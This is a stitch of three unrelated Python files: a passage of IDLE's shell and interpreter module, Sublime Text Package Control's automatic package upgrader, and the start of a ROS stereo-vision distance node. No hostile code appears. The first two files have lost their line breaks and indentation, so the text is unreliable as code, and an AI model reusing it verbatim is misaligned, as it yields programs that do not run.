""" self.tkconsole.text.after(300, self.remote_stack_viewer) return def remote_stack_viewer(self): from idlelib import RemoteObjectBrowser oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {}) if oid is None: self.tkconsole.root.bell() return item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid) from idlelib.TreeWidget import ScrolledCanvas, TreeNode top = Toplevel(self.tkconsole.root) theme = idleConf.GetOption('main','Theme','name') background = idleConf.GetHighlight(theme, 'normal')['background'] sc = ScrolledCanvas(top, bg=background, highlightthickness=0) sc.frame.pack(expand=1, fill="both") node = TreeNode(sc.canvas, None, item) node.expand() # XXX Should GC the remote tree when closing the window gid = 0 def execsource(self, source): "Like runsource() but assumes complete exec source" filename = self.stuffsource(source) self.execfile(filename, source) def execfile(self, filename, source=None): "Execute an existing file" if source is None: with tokenize.open(filename) as fp: source = fp.read() try: code = compile(source, filename, "exec") except (OverflowError, SyntaxError): self.tkconsole.resetoutput() print('*** Error in script or command!\n' 'Traceback (most recent call last):', file=self.tkconsole.stderr) InteractiveInterpreter.showsyntaxerror(self, filename) self.tkconsole.showprompt() else: self.runcode(code) def runsource(self, source): "Extend base class method: Stuff the source in the line cache first" filename = self.stuffsource(source) self.more = 0 self.save_warnings_filters = warnings.filters[:] warnings.filterwarnings(action="error", category=SyntaxWarning) # at the moment, InteractiveInterpreter expects str assert isinstance(source, str) #if isinstance(source, str): # from idlelib import IOBinding # try: # source = source.encode(IOBinding.encoding) # except UnicodeError: # self.tkconsole.resetoutput() # self.write("Unsupported characters in input\n") # return try: # InteractiveInterpreter.runsource() calls its runcode() 
method, # which is overridden (see below) return InteractiveInterpreter.runsource(self, source, filename) finally: if self.save_warnings_filters is not None: warnings.filters[:] = self.save_warnings_filters self.save_warnings_filters = None def stuffsource(self, source): "Stuff source in the filename cache" filename = "<pyshell#%d>" % self.gid self.gid = self.gid + 1 lines = source.split("\n") linecache.cache[filename] = len(source)+1, 0, lines, filename return filename def prepend_syspath(self, filename): "Prepend sys.path with file's directory if not already included" self.runcommand("""if 1: _filename = %r import sys as _sys from os.path import dirname as _dirname _dir = _dirname(_filename) if not _dir in _sys.path: _sys.path.insert(0, _dir) del _filename, _sys, _dirname, _dir \n""" % (filename,)) def showsyntaxerror(self, filename=None): """Override Interactive Interpreter method: Use Colorizing Color the offending position instead of printing it and pointing at it with a caret. """ tkconsole = self.tkconsole text = tkconsole.text text.tag_remove("ERROR", "1.0", "end") type, value, tb = sys.exc_info() msg = getattr(value, 'msg', '') or value or "<no detail available>" lineno = getattr(value, 'lineno', '') or 1 offset = getattr(value, 'offset', '') or 0 if offset == 0: lineno += 1 #mark end of offending line if lineno == 1: pos = "iomark + %d chars" % (offset-1) else: pos = "iomark linestart + %d lines + %d chars" % \ (lineno-1, offset-1) tkconsole.colorize_syntax_error(text, pos) tkconsole.resetoutput() self.write("SyntaxError: %s\n" % msg) tkconsole.showprompt() def showtraceback(self): "Extend base class method to reset output properly" self.tkconsole.resetoutput() self.checklinecache() InteractiveInterpreter.showtraceback(self) if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"): self.tkconsole.open_stack_viewer() def checklinecache(self): c = linecache.cache for key in list(c.keys()): if key[:1] + key[-1:] != "<>": del c[key] def runcommand(self, code): 
"Run the code without invoking the debugger" # The code better not raise an exception! if self.tkconsole.executing: self.display_executing_dialog() return 0 if self.rpcclt: self.rpcclt.remotequeue("exec", "runcode", (code,), {}) else: exec(code, self.locals) return 1 def runcode(self, code): "Override base class method" if self.tkconsole.executing: self.interp.restart_subprocess() self.checklinecache() if self.save_warnings_filters is not None: warnings.filters[:] = self.save_warnings_filters self.save_warnings_filters = None debugger = self.debugger try: self.tkconsole.beginexecuting() if not debugger and self.rpcclt is not None: self.active_seq = self.rpcclt.asyncqueue("exec", "runcode", (code,), {}) elif debugger: debugger.run(code, self.locals) else: exec(code, self.locals) except SystemExit: if not self.tkconsole.closing: if tkMessageBox.askyesno( "Exit?", "Do you want to exit altogether?", default="yes", master=self.tkconsole.text): raise else: self.showtraceback() else: raise except: if use_subprocess: print("IDLE internal error in runcode()", file=self.tkconsole.stderr) self.showtraceback() self.tkconsole.endexecuting() else: if self.tkconsole.canceled: self.tkconsole.canceled = False print("KeyboardInterrupt", file=self.tkconsole.stderr) else: self.showtraceback() finally: if not use_subprocess: try: self.tkconsole.endexecuting() except AttributeError: # shell may have closed pass def write(self, s): "Override base class method" return self.tkconsole.stderr.write(s) def display_port_binding_error(self): tkMessageBox.showerror( "Port Binding Error", "IDLE can't bind to a TCP/IP port, which is necessary to " "communicate with its Python execution server. This might be " "because no networking is installed on this computer. 
" "Run IDLE with the -n command line switch to start without a " "subprocess and refer to Help/IDLE Help 'Running without a " "subprocess' for further details.", master=self.tkconsole.text) def display_no_subprocess_error(self): tkMessageBox.showerror( "Subprocess Startup Error", "IDLE's subprocess didn't make connection. Either IDLE can't " "start a subprocess or personal firewall software is blocking " "the connection.", master=self.tkconsole.text) def display_executing_dialog(self): tkMessageBox.showerror( "Already executing", "The Python Shell window is already executing a command; " "please wait until it is finished.", master=self.tkconsole.text) class PyShell(OutputWindow): shell_title = "Python " + python_version() + " Shell" # Override classes ColorDelegator = ModifiedColorDelegator UndoDelegator = ModifiedUndoDelegator # Override menus menu_specs = [ ("file", "_File"), ("edit", "_Edit"), ("debug", "_Debug"), ("options", "_Options"), ("windows", "_Windows"), ("help", "_Help"), ] if sys.platform == "darwin": menu_specs[-2] = ("windows", "_Window") # New classes from idlelib.IdleHistory import History def __init__(self, flist=None): if use_subprocess: ms = self.menu_specs if ms[2][0] != "shell": ms.insert(2, ("shell", "She_ll")) self.interp = ModifiedInterpreter(self) if flist is None: root = Tk() fixwordbreaks(root) root.withdraw() flist = PyShellFileList(root) # OutputWindow.__init__(self, flist, None, None) # ## self.config(usetabs=1, indentwidth=8, context_use_ps1=1) self.usetabs = True # indentwidth must be 8 when using tabs. 
See note in EditorWindow: self.indentwidth = 8 self.context_use_ps1 = True # text = self.text text.configure(wrap="char") text.bind("<<newline-and-indent>>", self.enter_callback) text.bind("<<plain-newline-and-indent>>", self.linefeed_callback) text.bind("<<interrupt-execution>>", self.cancel_callback) text.bind("<<end-of-file>>", self.eof_callback) text.bind("<<open-stack-viewer>>", self.open_stack_viewer) text.bind("<<toggle-debugger>>", self.toggle_debugger) text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer) if use_subprocess: text.bind("<<view-restart>>", self.view_restart_mark) text.bind("<<restart-shell>>", self.restart_shell) # self.save_stdout = sys.stdout self.save_stderr = sys.stderr self.save_stdin = sys.stdin from idlelib import IOBinding self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding) self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding) self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding) self.console = PseudoOutputFile(self, "console", IOBinding.encoding) if not use_subprocess: sys.stdout = self.stdout sys.stderr = self.stderr sys.stdin = self.stdin try: # page help() text to shell. import pydoc # import must be done here to capture i/o rebinding. 
# XXX KBK 27Dec07 use a textView someday, but must work w/o subproc pydoc.pager = pydoc.plainpager except: sys.stderr = sys.__stderr__ raise # self.history = self.History(self.text) # self.pollinterval = 50 # millisec def get_standard_extension_names(self): return idleConf.GetExtensions(shell_only=True) reading = False executing = False canceled = False endoffile = False closing = False _stop_readline_flag = False def set_warning_stream(self, stream): global warning_stream warning_stream = stream def get_warning_stream(self): return warning_stream def toggle_debugger(self, event=None): if self.executing: tkMessageBox.showerror("Don't debug now", "You can only toggle the debugger when idle", master=self.text) self.set_debugger_indicator() return "break" else: db = self.interp.getdebugger() if db: self.close_debugger() else: self.open_debugger() def set_debugger_indicator(self): db = self.interp.getdebugger() self.setvar("<<toggle-debugger>>", not not db) def toggle_jit_stack_viewer(self, event=None): pass # All we need is the variable def close_debugger(self): db = self.interp.getdebugger() if db: self.interp.setdebugger(None) db.close() if self.interp.rpcclt: RemoteDebugger.close_remote_debugger(self.interp.rpcclt) self.resetoutput() self.console.write("[DEBUG OFF]\n") sys.ps1 = ">>> " self.showprompt() self.set_debugger_indicator() def open_debugger(self): if self.interp.rpcclt: dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt, self) else: dbg_gui = Debugger.Debugger(self) self.interp.setdebugger(dbg_gui) dbg_gui.load_breakpoints() sys.ps1 = "[DEBUG ON]\n>>> " self.showprompt() self.set_debugger_indicator() def beginexecuting(self): "Helper for ModifiedInterpreter" self.resetoutput() self.executing = 1 def endexecuting(self): "Helper for ModifiedInterpreter" self.executing = 0 self.canceled = 0 self.showprompt() def close(self): "Extend EditorWindow.close()" if self.executing: response = tkMessageBox.askokcancel( "Kill?", "The program is still 
running!\n Do you want to kill it?", default="ok", parent=self.text) if response is False: return "cancel" self.stop_readline() self.canceled = True self.closing = True return EditorWindow.close(self) def _close(self): "Extend EditorWindow._close(), shut down debugger and execution server" self.close_debugger() if use_subprocess: self.interp.kill_subprocess() # Restore std streams sys.stdout = self.save_stdout sys.stderr = self.save_stderr sys.stdin = self.save_stdin # Break cycles self.interp = None self.console = None self.flist.pyshell = None self.history = None EditorWindow._close(self) def ispythonsource(self, filename): "Override EditorWindow method: never remove the colorizer" return True def short_title(self): return self.shell_title COPYRIGHT = \ 'Type "copyright", "credits" or "license()" for more information.' def begin(self): self.text.mark_set("iomark", "insert") self.resetoutput() if use_subprocess: nosub = '' client = self.interp.start_subprocess() if not client: self.close() return False else: nosub = ("==== No Subprocess ====\n\n" + "WARNING: Running IDLE without a Subprocess is deprecated\n" + "and will be removed in a later version. See Help/IDLE Help\n" + "for details.\n\n") sys.displayhook = rpc.displayhook self.write("Python %s on %s\n%s\n%s" % (sys.version, sys.platform, self.COPYRIGHT, nosub)) self.showprompt() import tkinter tkinter._default_root = None # 03Jan04 KBK What's this? return True def stop_readline(self): if not self.reading: # no nested mainloop to exit. 
return self._stop_readline_flag = True self.top.quit() def readline(self): save = self.reading try: self.reading = 1 self.top.mainloop() # nested mainloop() finally: self.reading = save if self._stop_readline_flag: self._stop_readline_flag = False return "" line = self.text.get("iomark", "end-1c") if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C line = "\n" self.resetoutput() if self.canceled: self.canceled = 0 if not use_subprocess: raise KeyboardInterrupt if self.endoffile: self.endoffile = 0 line = "" return line def isatty(self): return True def cancel_callback(self, event=None): try: if self.text.compare("sel.first", "!=", "sel.last"): return # Active selection -- always use default binding except: pass if not (self.executing or self.reading): self.resetoutput() self.interp.write("KeyboardInterrupt\n") self.showprompt() return "break" self.endoffile = 0 self.canceled = 1 if (self.executing and self.interp.rpcclt): if self.interp.getdebugger(): self.interp.restart_subprocess() else: self.interp.interrupt_subprocess() if self.reading: self.top.quit() # exit the nested mainloop() in readline() return "break" def eof_callback(self, event): if self.executing and not self.reading: return # Let the default binding (delete next char) take over if not (self.text.compare("iomark", "==", "insert") and self.text.compare("insert", "==", "end-1c")): return # Let the default binding (delete next char) take over if not self.executing: self.resetoutput() self.close() else: self.canceled = 0 self.endoffile = 1 self.top.quit() return "break" def linefeed_callback(self, event): # Insert a linefeed without entering anything (still autoindented) if self.reading: self.text.insert("insert", "\n") self.text.see("insert") else: self.newline_and_indent_event(event) return "break" def enter_callback(self, event): if self.executing and not self.reading: return # Let the default binding (insert '\n') take over # If some text is selected, recall the selection # (but only 
if this before the I/O mark) try: sel = self.text.get("sel.first", "sel.last") if sel: if self.text.compare("sel.last", "<=", "iomark"): self.recall(sel, event) return "break" except: pass # If we're strictly before the line containing iomark, recall # the current line, less a leading prompt, less leading or # trailing whitespace if self.text.compare("insert", "<", "iomark linestart"): # Check if there's a relevant stdin range -- if so, use it prev = self.text.tag_prevrange("stdin", "insert") if prev and self.text.compare("insert", "<", prev[1]): self.recall(self.text.get(prev[0], prev[1]), event) return "break" next = self.text.tag_nextrange("stdin", "insert") if next and self.text.compare("insert lineend", ">=", next[0]): self.recall(self.text.get(next[0], next[1]), event) return "break" # No stdin mark -- just get the current line, less any prompt indices = self.text.tag_nextrange("console", "insert linestart") if indices and \ self.text.compare(indices[0], "<=", "insert linestart"): self.recall(self.text.get(indices[1], "insert lineend"), event) else: self.recall(self.text.get("insert linestart", "insert lineend"), event) return "break" # If we're between the beginning of the line and the iomark, i.e. 
# in the prompt area, move to the end of the prompt if self.text.compare("insert", "<", "iomark"): self.text.mark_set("insert", "iomark") # If we're in the current input and there's only whitespace # beyond the cursor, erase that whitespace first s = self.text.get("insert", "end-1c") if s and not s.strip(): self.text.delete("insert", "end-1c") # If we're in the current input before its last line, # insert a newline right at the insert point if self.text.compare("insert", "<", "end-1c linestart"): self.newline_and_indent_event(event) return "break" # We're in the last line; append a newline and submit it self.text.mark_set("insert", "end-1c") if self.reading: self.text.insert("insert", "\n") self.text.see("insert") else: self.newline_and_indent_event(event) self.text.tag_add("stdin", "iomark", "end-1c") self.text.update_idletasks() if self.reading: self.top.quit() # Break out of recursive mainloop() else: self.runit() return "break" def recall(self, s, event): # remove leading and trailing empty or whitespace lines s = re.sub(r'^\s*\n', '' , s) s = re.sub(r'\n\s*$', '', s) lines = s.split('\n') self.text.undo_block_start() try: self.text.tag_remove("sel", "1.0", "end") self.text.mark_set("insert", "end-1c") prefix = self.text.get("insert linestart", "insert") if prefix.rstrip().endswith(':'): self.newline_and_indent_event(event) prefix = self.text.get("insert linestart", "insert") self.text.insert("insert", lines[0].strip()) if len(lines) > 1: orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0) new_base_indent = re.search(r'^([ \t]*)', prefix).group(0) for line in lines[1:]: if line.startswith(orig_base_indent): # replace orig base indentation with new indentation line = new_base_indent + line[len(orig_base_indent):] self.text.insert('insert', '\n'+line.rstrip()) finally: self.text.see("insert") self.text.undo_block_stop() def runit(self): line = self.text.get("iomark", "end-1c") # Strip off last newline and surrounding whitespace. 
# (To allow you to hit return twice to end a statement.) i = len(line) while i > 0 and line[i-1] in " \t": i = i-1 if i > 0 and line[i-1] == "\n": i = i-1 while i > 0 and line[i-1] in " \t": i = i-1 line = line[:i] more = self.interp.runsource(line) def open_stack_viewer(self, event=None): if self.interp.rpcclt: return self.interp.remote_stack_viewer() try: sys.last_traceback except: tkMessageBox.showerror("No stack trace", "There is no stack trace yet.\n" "(sys.last_traceback is not defined)", master=self.text) return from idlelib.StackViewer import StackBrowser sv = StackBrowser(self.root, self.flist) def view_restart_mark(self, event=None): self.text.see("iomark") self.text.see("restart") def restart_shell(self, event=None): "Callback for Run/Restart Shell Cntl-F6" self.interp.restart_subprocess(with_cwd=True) def showprompt(self): self.resetoutput() try: s = str(sys.ps1) except: s = "" self.console.write(s) self.text.mark_set("insert", "end-1c") self.set_line_and_column() self.io.reset_undo() def resetoutput(self): source = self.text.get("iomark", "end-1c") if self.history: self.history.store(source) if self.text.get("end-2c") != "\n": self.text.insert("end-1c", "\n") self.text.mark_set("iomark", "end-1c") self.set_line_and_column() def write(self, s, tags=()): if isinstance(s, str) and len(s) and max(s) > '\uffff': # Tk doesn't support outputting non-BMP characters # Let's assume what printed string is not very long, # find first non-BMP character and construct informative # UnicodeEncodeError exception. for start, char in enumerate(s): if char > '\uffff': break raise UnicodeEncodeError("UCS-2", char, start, start+1, 'Non-BMP character not supported in Tk') try: self.text.mark_gravity("iomark", "right") count = OutputWindow.write(self, s, tags, "iomark") self.text.mark_gravity("iomark", "left") except: raise ###pass # ### 11Aug07 KBK if we are expecting exceptions # let's find out what they are and be specific. 
if self.canceled: self.canceled = 0 if not use_subprocess: raise KeyboardInterrupt return count def rmenu_check_cut(self): try: if self.text.compare('sel.first', '<', 'iomark'): return 'disabled' except TclError: # no selection, so the index 'sel.first' doesn't exist return 'disabled' return super().rmenu_check_cut() def rmenu_check_paste(self): if self.text.compare('insert','<','iomark'): return 'disabled' return super().rmenu_check_paste() class PseudoFile(io.TextIOBase): def __init__(self, shell, tags, encoding=None): self.shell = shell self.tags = tags self._encoding = encoding @property def encoding(self): return self._encoding @property def name(self): return '<%s>' % self.tags def isatty(self): return True class PseudoOutputFile(PseudoFile): def writable(self): return True def write(self, s): if self.closed: raise ValueError("write to closed file") if type(s) is not str: if not isinstance(s, str): raise TypeError('must be str, not ' + type(s).__name__) # See issue #19481 s = str.__str__(s) return self.shell.write(s, self.tags) class PseudoInputFile(PseudoFile): def __init__(self, shell, tags, encoding=None): PseudoFile.__init__(self, shell, tags, encoding) self._line_buffer = '' def readable(self): return True def read(self, size=-1): if self.closed: raise ValueError("read from closed file") if size is None: size = -1 elif not isinstance(size, int): raise TypeError('must be int, not ' + type(size).__name__) result = self._line_buffer self._line_buffer = '' if size < 0: while True: line = self.shell.readline() if not line: break result += line else: while len(result) < size: line = self.shell.readline() if not line: break result += line self._line_buffer = result[size:] result = result[:size] return result def readline(self, size=-1): if self.closed: raise ValueError("read from closed file") if size is None: size = -1 elif not isinstance(size, int): raise TypeError('must be int, not ' + type(size).__name__) line = self._line_buffer or self.shell.readline() if 
size < 0: size = len(line) eol = line.find('\n', 0, size) if eol >= 0: size = eol + 1 self._line_buffer = line[size:] return line[:size] def close(self): self.shell.close() usage_msg = """\ USAGE: idle [-deins] [-t title] [file]* idle [-dns] [-t title] (-c cmd | -r file) [arg]* idle [-dns] [-t title] - [arg]* -h print this help message and exit -n run IDLE without a subprocess (DEPRECATED, see Help/IDLE Help for details) The following options will override the IDLE 'settings' configuration: -e open an edit window -i open a shell window The following options imply -i and will open a shell: -c cmd run the command in a shell, or -r file run script from file -d enable the debugger -s run $IDLESTARTUP or $PYTHONSTARTUP before anything else -t title set title of shell window A default edit window will be bypassed when -c, -r, or - are used. [arg]* are passed to the command (-c) or script (-r) in sys.argv[1:]. Examples: idle Open an edit window or shell depending on IDLE's configuration. idle foo.py foobar.py Edit the files, also open a shell if configured to start with shell. idle -est "Baz" foo.py Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell window with the title "Baz". idle -c "import sys; print(sys.argv)" "foo" Open a shell window and run the command, passing "-c" in sys.argv[0] and "foo" in sys.argv[1]. idle -d -s -r foo.py "Hello World" Open a shell window, run a startup script, enable the debugger, and run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in sys.argv[1]. echo "import sys; print(sys.argv)" | idle - "foobar" Open a shell window, run the script piped in, passing '' in sys.argv[0] and "foobar" in sys.argv[1]. 
""" def main(): global flist, root, use_subprocess capture_warnings(True) use_subprocess = True enable_shell = False enable_edit = False debug = False cmd = None script = None startup = False try: opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:") except getopt.error as msg: print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr) sys.exit(2) for o, a in opts: if o == '-c': cmd = a enable_shell = True if o == '-d': debug = True enable_shell = True if o == '-e': enable_edit = True if o == '-h': sys.stdout.write(usage_msg) sys.exit() if o == '-i': enable_shell = True if o == '-n': print(" Warning: running IDLE without a subprocess is deprecated.", file=sys.stderr) use_subprocess = False if o == '-r': script = a if os.path.isfile(script): pass else: print("No script file: ", script) sys.exit() enable_shell = True if o == '-s': startup = True enable_shell = True if o == '-t': PyShell.shell_title = a enable_shell = True if args and args[0] == '-': cmd = sys.stdin.read() enable_shell = True # process sys.argv and sys.path: for i in range(len(sys.path)): sys.path[i] = os.path.abspath(sys.path[i]) if args and args[0] == '-': sys.argv = [''] + args[1:] elif cmd: sys.argv = ['-c'] + args elif script: sys.argv = [script] + args elif args: enable_edit = True pathx = [] for filename in args: pathx.append(os.path.dirname(filename)) for dir in pathx: dir = os.path.abspath(dir) if not dir in sys.path: sys.path.insert(0, dir) else: dir = os.getcwd() if dir not in sys.path: sys.path.insert(0, dir) # check the IDLE settings configuration (but command line overrides) edit_start = idleConf.GetOption('main', 'General', 'editor-on-startup', type='bool') enable_edit = enable_edit or edit_start enable_shell = enable_shell or not enable_edit # start editor and/or shell windows: root = Tk(className="Idle") # set application icon icondir = os.path.join(os.path.dirname(__file__), 'Icons') if system() == 'Windows': iconfile = os.path.join(icondir, 'idle.ico') 
root.wm_iconbitmap(default=iconfile) elif TkVersion >= 8.5: ext = '.png' if TkVersion >= 8.6 else '.gif' iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext)) for size in (16, 32, 48)] icons = [PhotoImage(file=iconfile) for iconfile in iconfiles] root.wm_iconphoto(True, *icons) fixwordbreaks(root) root.withdraw() flist = PyShellFileList(root) macosxSupport.setupApp(root, flist) if enable_edit: if not (cmd or script): for filename in args[:]: if flist.open(filename) is None: # filename is a directory actually, disconsider it args.remove(filename) if not args: flist.new() if enable_shell: shell = flist.open_shell() if not shell: return # couldn't open shell if macosxSupport.isAquaTk() and flist.dict: # On OSX: when the user has double-clicked on a file that causes # IDLE to be launched the shell window will open just in front of # the file she wants to see. Lower the interpreter window when # there are open files. shell.top.lower() else: shell = flist.pyshell # Handle remaining options. If any of these are set, enable_shell # was set also, so shell must be true to reach here. if debug: shell.open_debugger() if startup: filename = os.environ.get("IDLESTARTUP") or \ os.environ.get("PYTHONSTARTUP") if filename and os.path.isfile(filename): shell.interp.execfile(filename) if cmd or script: shell.interp.runcommand("""if 1: import sys as _sys _sys.argv = %r del _sys \n""" % (sys.argv,)) if cmd: shell.interp.execsource(cmd) elif script: shell.interp.prepend_syspath(script) shell.interp.execfile(script) elif shell: # If there is a shell window and no cmd or script in progress, # check for problematic OS X Tk versions and print a warning # message in the IDLE shell window; this is less intrusive # than always opening a separate window. tkversionwarning = macosxSupport.tkVersionWarning(root) if tkversionwarning: shell.interp.runcommand("print('%s')" % tkversionwarning) while flist.inversedict: # keep IDLE running while files are open. 
root.mainloop() root.destroy() capture_warnings(False) if __name__ == "__main__": sys.modules['PyShell'] = sys.modules['__main__'] main() capture_warnings(False) # Make sure turned off; see issue 18081
# ---- automatic_upgrader.py (concatenation artifact: next module begins here) ----
import threading import re import os import datetime import locale # To prevent import errors in thread with datetime import time import functools import sublime from .show_error import show_error from .console_write import console_write from .package_installer import PackageInstaller from .package_renamer import PackageRenamer from .open_compat import open_compat, read_compat from .settings import pc_settings_filename, load_list_setting class AutomaticUpgrader(threading.Thread): """ Automatically checks for updated packages and installs them. controlled by the `auto_upgrade`, `auto_upgrade_ignore`, and `auto_upgrade_frequency` settings. """ def __init__(self, found_packages, found_dependencies): """ :param found_packages: A list of package names for the packages that were found to be installed on the machine. :param found_dependencies: A list of installed dependencies found on the machine """ self.installer = PackageInstaller() self.manager = self.installer.manager self.load_settings() self.package_renamer = PackageRenamer() self.package_renamer.load_settings() self.auto_upgrade = self.settings.get('auto_upgrade') self.auto_upgrade_ignore = self.settings.get('auto_upgrade_ignore') self.load_last_run() self.determine_next_run() # Detect if a package is missing that should be installed self.missing_packages = list(set(self.installed_packages) - set(found_packages)) self.missing_dependencies = list(set(self.manager.find_required_dependencies()) - set(found_dependencies)) if self.auto_upgrade and self.next_run <= time.time(): self.save_last_run(time.time()) threading.Thread.__init__(self) def load_last_run(self): """ Loads the last run time from disk into memory """ self.last_run = None self.last_run_file = os.path.join(sublime.packages_path(), 'User', 'Package Control.last-run') if os.path.isfile(self.last_run_file): with open_compat(self.last_run_file) as fobj: try: self.last_run = int(read_compat(fobj)) except ValueError: pass def determine_next_run(self): """ 
Figure out when the next run should happen """ self.next_run = int(time.time()) frequency = self.settings.get('auto_upgrade_frequency') if frequency: if self.last_run: self.next_run = int(self.last_run) + (frequency * 60 * 60) else: self.next_run = time.time() def save_last_run(self, last_run): """ Saves a record of when the last run was :param last_run: The unix timestamp of when to record the last run as """ with open_compat(self.last_run_file, 'w') as fobj: fobj.write(str(int(last_run))) def load_settings(self): """ Loads the list of installed packages """ self.settings = sublime.load_settings(pc_settings_filename()) self.installed_packages = load_list_setting(self.settings, 'installed_packages') self.should_install_missing = self.settings.get('install_missing') def run(self): self.install_missing() if self.next_run > time.time(): self.print_skip() return self.upgrade_packages() def install_missing(self): """ Installs all packages that were listed in the list of `installed_packages` from Package Control.sublime-settings but were not found on the filesystem and passed as `found_packages`. Also installs any missing dependencies. """ # We always install missing dependencies - this operation does not # obey the "install_missing" setting since not installing dependencies # would result in broken packages. 
if self.missing_dependencies: total_missing_dependencies = len(self.missing_dependencies) dependency_s = 'ies' if total_missing_dependencies != 1 else 'y' console_write(u'Installing %s missing dependenc%s' % (total_missing_dependencies, dependency_s), True) dependencies_installed = 0 for dependency in self.missing_dependencies: if self.installer.manager.install_package(dependency, is_dependency=True): console_write(u'Installed missing dependency %s' % dependency, True) dependencies_installed += 1 if dependencies_installed: def notify_restart(): dependency_was = 'ies were' if dependencies_installed != 1 else 'y was' message = (u'%s missing dependenc%s just ' + u'installed. Sublime Text should be restarted, otherwise ' + u'one or more of the installed packages may not function ' + u'properly.') % (dependencies_installed, dependency_was) show_error(message) sublime.set_timeout(notify_restart, 1000) # Missing package installs are controlled by a setting if not self.missing_packages or not self.should_install_missing: return total_missing_packages = len(self.missing_packages) if total_missing_packages > 0: package_s = 's' if total_missing_packages != 1 else '' console_write(u'Installing %s missing package%s' % (total_missing_packages, package_s), True) # Fetching the list of packages also grabs the renamed packages self.manager.list_available_packages() renamed_packages = self.manager.settings.get('renamed_packages', {}) for package in self.missing_packages: # If the package has been renamed, detect the rename and update # the settings file with the new name as we install it if package in renamed_packages: old_name = package new_name = renamed_packages[old_name] def update_installed_packages(): self.installed_packages.remove(old_name) self.installed_packages.append(new_name) self.settings.set('installed_packages', self.installed_packages) sublime.save_settings(pc_settings_filename()) sublime.set_timeout(update_installed_packages, 10) package = new_name if 
self.installer.manager.install_package(package): console_write(u'Installed missing package %s' % package, True) def print_skip(self): """ Prints a notice in the console if the automatic upgrade is skipped due to already having been run in the last `auto_upgrade_frequency` hours. """ last_run = datetime.datetime.fromtimestamp(self.last_run) next_run = datetime.datetime.fromtimestamp(self.next_run) date_format = '%Y-%m-%d %H:%M:%S' message_string = u'Skipping automatic upgrade, last run at %s, next run at %s or after' % ( last_run.strftime(date_format), next_run.strftime(date_format)) console_write(message_string, True) def upgrade_packages(self): """ Upgrades all packages that are not currently upgraded to the lastest version. Also renames any installed packages to their new names. """ if not self.auto_upgrade: return self.package_renamer.rename_packages(self.installer) package_list = self.installer.make_package_list(['install', 'reinstall', 'downgrade', 'overwrite', 'none'], ignore_packages=self.auto_upgrade_ignore) # If Package Control is being upgraded, just do that and restart for package in package_list: if package[0] != 'Package Control': continue def reset_last_run(): # Re-save the last run time so it runs again after PC has # been updated self.save_last_run(self.last_run) sublime.set_timeout(reset_last_run, 1) package_list = [package] break if not package_list: console_write(u'No updated packages', True) return console_write(u'Installing %s upgrades' % len(package_list), True) disabled_packages = [] def do_upgrades(): # Wait so that the ignored packages can be "unloaded" time.sleep(0.7) for info in package_list: if info[0] in disabled_packages: # We use a functools.partial to generate the on-complete callback in # order to bind the current value of the parameters, unlike lambdas. 
on_complete = functools.partial(self.installer.reenable_package, info[0]) else: on_complete = None self.installer.manager.install_package(info[0]) version = re.sub('^.*?(v[\d\.]+).*?$', '\\1', info[2]) if version == info[2] and version.find('pull with') != -1: vcs = re.sub('^pull with (\w+).*?$', '\\1', version) version = 'latest %s commit' % vcs message_string = u'Upgraded %s to %s' % (info[0], version) console_write(message_string, True) if on_complete: sublime.set_timeout(on_complete, 700) # Disabling a package means changing settings, which can only be done # in the main thread. We then create a new background thread so that # the upgrade process does not block the UI. def disable_packages(): packages = [info[0] for info in package_list] disabled_packages.extend(self.installer.disable_packages(packages, 'upgrade')) threading.Thread(target=do_upgrades).start() sublime.set_timeout(disable_packages, 1)
# ---- binocular_measuring_cv.py (concatenation artifact: next module begins here) ----
#!/usr/bin/env python3
# Francesco Marrato 2021-03-17
# Hope you like lists, multithreading, and buffers
#
# Stereo ("binocular") distance-measurement ROS node:
#   left/right camera topics -> per-eye frame buffers -> YOLOv4 DNN (one
#   subprocess per eye) -> cross-eye instance matching -> disparity-based
#   distance estimate published as a Vision_Object message and drawn on screen.
from sensor_msgs.msg import Image  # will show error but is fine
from cv_bridge import CvBridge  # will show error but is fine
from binocular_p3.msg import Vision_Object  # will show error but is fine
from colorama import Fore, Style
from scipy.spatial import distance as dist
from math import isclose
import traceback
import numpy as np
import cv2
import atexit
import sys
import time
import queue
import rospy  # will show error but is fine
import threading
import multiprocessing

# ======================= CHANGE THESE TO YOUR DIRECTORY =======================
# Unfortunately because of how the code is initialized by ros, relative paths
# can be pretty convoluted, so instead we are doing absolute path.
# Baked YOLOv4 network files:
yolo_config = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/TinyNet/yolov4-tiny-custom-Capstone.cfg"
yolo_names = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/obj_networkV2.names"
yolo_weights = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/TinyNet/yolov4-tiny-custom-Capstone_last.weights"
# ==============================================================================

# Frame buffers for incoming camera feed (filled by the ROS subscriber callbacks).
frame_buffer_left = queue.Queue(maxsize=60)  # approximately 3 seconds of footage
frame_buffer_right = queue.Queue(maxsize=60)
# Frame buffers for frames pushed through the dnn (filled by dnn_computation
# subprocesses; multiprocessing.Queue so they cross the process boundary).
dnn_buffer_left = multiprocessing.Queue(maxsize=60)
dnn_buffer_right = multiprocessing.Queue(maxsize=60)

# CONSTANTS (created for ease of tuning, globals are not necessary in design)
KILL_THREADS = False  # kills continuous multithreaded/multiprocessed tasks
CATEGORIES = None  # used for output drawing (class label strings, set by load_dnn_yolo)
CATEGORIES_COLORS = None  # one random BGR color per class, set by load_dnn_yolo
MIN_CONFIDENCE = 0.7
FRAME_HEIGHT = 576
FRAME_WIDTH = 720
# used to artificially reduce the framerate for increased blob size
left_count = 0
right_count = 0
FRAME_INTERVAL = 1
